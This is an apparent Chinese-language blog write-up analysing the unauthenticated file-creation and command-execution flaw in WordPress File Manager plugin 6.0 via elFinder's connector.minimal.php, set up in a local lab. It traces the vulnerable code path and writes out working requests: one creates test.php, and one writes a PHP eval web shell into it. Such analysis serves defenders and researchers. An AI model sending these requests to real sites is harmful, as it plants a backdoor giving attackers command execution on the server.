Wordpress 插件命令执行

  • Wordpress 插件命令执行已关闭评论
  • 20 views
  • A+

环境搭建

利用 phpstudy 搭建 wordpresshttp://wordpress.test/wp-admin/plugin-install.php 将解压一次后的漏洞插件压缩包上传并启用插件。

File Manager插件6.0版本

漏洞利用

这段代码来自 elFinder 项目,这是一个向 Web 应用程序提供文件浏览器 GUI 的框架。这个非常具体的代码仅作为示例,而不能在生产应用程序中直接使用。但是,正如我们所看到的,使用了它,结果是可以执行这部分代码而无需进行身份验证。

exp-db 搜索 elFinder

20200909144050.png

下载下来的漏洞利用文件需要修改部分

20200909150021.png

20200909150609.png

漏洞分析

发送一个这样的 payload 来进行创建文件的操作 http://wordpress.test/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=mkfile&name=test.php&target=l1_Lw

漏洞触发位置 /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

通过创建 elFinderConnector 对象,进而调用 elFinderConnector.run

20200909150854.png

读取所有的请求参数保存到 $src 中, $cmd 获取 cmd 变量。
\elFinderConnector::run

20200909152145.png

接着执行到循环 foreach ($this->elFinder->commandArgsList($cmd) as $name => $req) {$cmd 进行校验

20200909152802.png

跟进函数commandArgsList

\elFinder::commandArgsList

20200909153814.png

\elFinder::commandExists

20200909153415.png

通过判断 $cmd ,在 \$this->commands[\$cmd] 中发现了可以调用的方法

\elFinder::$commands

20200909153117.png

继续执行,发现 $this->output($this->elFinder->exec($cmd, $args));

20200909154150.png

\elFinder::exec

控制 $cmd = makedile 时, 为满足条件继续向下执行,需要传入 $target 或者 $dst

20200909154534.png

$this->volume($dst) 根据传入的 $dst 前缀进行选择 l1_ 或者 t1_ 我们在后面进行调试时会发现生成文件的位置前缀为所对应的 root 的值 ,所以我们在这里选择 l1_

\elFinder::volume

20200909155825.png

20200909160230.png

20200909160319.png

继续执行到动态调用,通过 $result = $this->$cmd($args); 调用makefile方法。

\elFinderVolumeDriver::mkfile

20200909165300.png

$path = $this->decode($dst);

\elFinderVolumeDriver::decode

20200909165735.png
decode 函数 先将$hash 的值根据 $this->id 进行分割,然后替换字串并进行 base64 解码 然后拼接 所对应的 $this->root

返回$path = E:\Tools\phpstudy_pro\WWW\wordpress\wp-content\plugins\wp-file-manager\lib\files

继续回到 mkfile 函数中执行

20200910103759.png

\elFinderVolumeLocalFileSystem::_mkfile

20200910104145.png

20200909172828.png

最后顺利生成文件在 E:\Tools\phpstudy_pro\WWW\wordpress\wp-content\plugins\wp-file-manager\lib\files\test.php

对于网站的位置就是 \wp-content\plugins\wp-file-manager\lib\files\test.php

20200909173020.png

然后再调用 PUT 方法,传值到 mkfile 生成的文件内。

http://wordpress.test/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=put&target=l1_dGVzdC5waHA=&content=<?php eval($_GET['cmd']);?>

20200909175132.png

前一部分不在详述,直接跟到 $result = $this->$cmd($args); 调用 put 方法

\elFinder::put

20200910094843.png

\elFinderVolumeDriver::putContents

20200910095150.png

\elFinderVolumeDriver::decode

20200910101728.png
decode 函数 先将$hash 的值根据 $this->id 进行分割,然后替换字串并进行 base64 解码 然后拼接 所对应的 $this->root 最后会返回 $path 的值为E:\Tools\phpstudy_pro\WWW\wordpress\wp-content\plugins\wp-file-manager\lib\files\test.php
\elFinderVolumeLocalFileSystem::_filePutContents

20200910095357.png

成功将字符串写入文件中


成功利用还可以直接利用 upload 方法,上传文件

20200914104323.png

\elFinder::upload

20200914104918.png